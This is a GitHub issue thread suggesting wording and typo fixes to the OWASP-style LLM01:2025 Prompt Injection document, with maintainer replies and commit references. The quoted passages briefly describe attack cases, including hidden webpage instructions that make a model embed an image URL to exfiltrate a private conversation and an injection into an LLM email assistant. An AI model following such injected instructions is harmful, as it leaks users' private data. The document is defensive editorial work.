Suggested edits for LLM01:2025 Prompt Injection #467

dl8on · 2024-11-08T20:51:13Z

Listing a few suggested edits and/or typo fixes for LLM01:2025 Prompt Injection md file (2_0_vulns/LLM01_PromptInjection.md).

In the marked up text, bolded text represents insertions, ~~strikethrough~~ represents deletions.

Edits to Line 7

Currently, Line 7 states:

Prompt Injections vulnerabilities exist in how models process prompts, and how input may force the model to incorrectly pass prompt data to other parts of the model, potentially causing them to violate guidelines, generate harmful content, enable unauthorized access, or influence critical decisions. While techniques like Retrieval Augmented Generation (RAG) and fine-tuning aim to make LLM outputs more relevant and accurate, research shows that they do not fully mitigate prompt injection vulnerabilities.

Marked up:

Prompt Injections vulnerabilities exist in how models process prompts, and how input may force the model to incorrectly pass prompt data to other parts of the model, potentially causing them to violate guidelines, generate harmful content, enable unauthorized access, or influence critical decisions. While techniques like Retrieval Augmented Generation (RAG) and fine-tuning aim to make LLM outputs more relevant and accurate, research shows that they do not fully mitigate prompt injection vulnerabilities.

Clean:

Prompt Injection vulnerabilities exist in how models process prompts, and how input may force the model to incorrectly pass prompt data to other parts of the model, potentially causing them to violate guidelines, generate harmful content, enable unauthorized access, or influence critical decisions. While techniques like Retrieval Augmented Generation (RAG) and fine-tuning aim to make LLM outputs more relevant and accurate, research shows that they do not fully mitigate prompt injection vulnerabilities.

Edits to Line 17

Currently, Line 17 states:

The severity and nature of the impact of a successful prompt injection attack can vary greatly and are largely dependent on both the business context the model operates in, and the agency the model is architected with. However, generally prompt injection can lead to - included but not limited to:

Marked up:

The severity and nature of the impact of a successful prompt injection attack can vary greatly and are largely dependent on both the business context the model operates in, and the agency with which the model is architected ~~with~~. ~~However~~Generally, ~~generally~~however, prompt injection can lead to unintended outcomes, ~~included~~ including but not limited to:

Clean:

The severity and nature of the impact of a successful prompt injection attack can vary greatly and are largely dependent on both the business context the model operates in, and the agency with which the model is architected. Generally, however, prompt injection can lead to unintended outcomes, including but not limited to:

Edits to Line 30

Currently, Line 30 states:

Prompt injection vulnerabilities are possible due to the nature of generative AI. Due to the nature of stochastic influence at the heart of the way models work, it is unclear if there is fool-proof prevention for prompt injection. However, but the following measures can mitigate the impact of prompt injections:

Marked up:

Prompt injection vulnerabilities are possible due to the nature of generative AI. ~~Due to the nature of~~ Given the stochastic influence at the heart of the way models work, it is unclear if there is are fool-proof methods of prevention for prompt injection. However, ~~but~~ the following measures can mitigate the impact of prompt injections:

Clean:

Prompt injection vulnerabilities are possible due to the nature of generative AI. Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection. However, the following measures can mitigate the impact of prompt injections:

Edits to Line 35

Currently, Line 35 states:

Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, handling these functions in code rather than providing them to the model. Restrict the model's access to the minimum necessary for its intended operations.

Marked up:

Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, ~~handling~~and handle these functions in code rather than providing them to the model. Restrict the model's access privileges to the minimum necessary for its intended operations.

Clean:

Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, and handle these functions in code rather than providing them to the model. Restrict the model's access privileges to the minimum necessary for its intended operations.

Edits to Line 43

Currently, Line 43 states:

Indirect Injection: A user employs an LLM to summarize a webpage containing hidden instructions that cause the LLM to insert an image linking to a URL, exfiltrating the private conversation.

Marked up:

Indirect Injection: A user employs an LLM to summarize a webpage containing hidden instructions that cause the LLM to insert an image linking to a URL, ~~exfiltrating~~leading to exfiltration of the the private conversation.

Clean:

Indirect Injection: A user employs an LLM to summarize a webpage containing hidden instructions that cause the LLM to insert an image linking to a URL, leading to exfiltration of the the private conversation.

Edits to Line 46

Currently, Line 46 states:

Code Injection: Code Injection: An attacker exploits a vulnerability (CVE-2024-5184) in an LLM-powered email assistant to inject malicious prompts, allowing access to sensitive information and manipulation of email content.

Marked up:

Code Injection: ~~Code Injection: ~~An attacker exploits a vulnerability (CVE-2024-5184) in an LLM-powered email assistant to inject malicious prompts, allowing access to sensitive information and manipulation of email content.

Clean:

Code Injection: An attacker exploits a vulnerability (CVE-2024-5184) in an LLM-powered email assistant to inject malicious prompts, allowing access to sensitive information and manipulation of email content.

github-actions · 2024-11-08T20:51:48Z

👋 Thanks for reporting! Please ensure labels are applied appropriately to the issue so that the workflow automation can triage this to the correct member of the core team

GangGreenTemperTatum · 2024-11-08T21:12:16Z

awesome thanks so much Dustin!

GangGreenTemperTatum added a commit that referenced this issue Nov 9, 2024

fix: minor rc 2025 fixes from #467

dcbfbe5

GangGreenTemperTatum mentioned this issue Nov 9, 2024

fix: minor rc 2025 fixes from #467 #468

Merged

4 tasks

GangGreenTemperTatum added a commit that referenced this issue Nov 9, 2024

fix: minor rc 2025 fixes from #467 (#468)

6f51ec0

GangGreenTemperTatum closed this as completed Nov 9, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Suggested edits for LLM01:2025 Prompt Injection #467

Suggested edits for LLM01:2025 Prompt Injection #467

dl8on commented Nov 8, 2024

github-actions bot commented Nov 8, 2024

GangGreenTemperTatum commented Nov 8, 2024

Suggested edits for LLM01:2025 Prompt Injection #467

Suggested edits for LLM01:2025 Prompt Injection #467

Comments

dl8on commented Nov 8, 2024

Edits to Line 7

Edits to Line 17

Edits to Line 30

Edits to Line 35

Edits to Line 43

Edits to Line 46

github-actions bot commented Nov 8, 2024

GangGreenTemperTatum commented Nov 8, 2024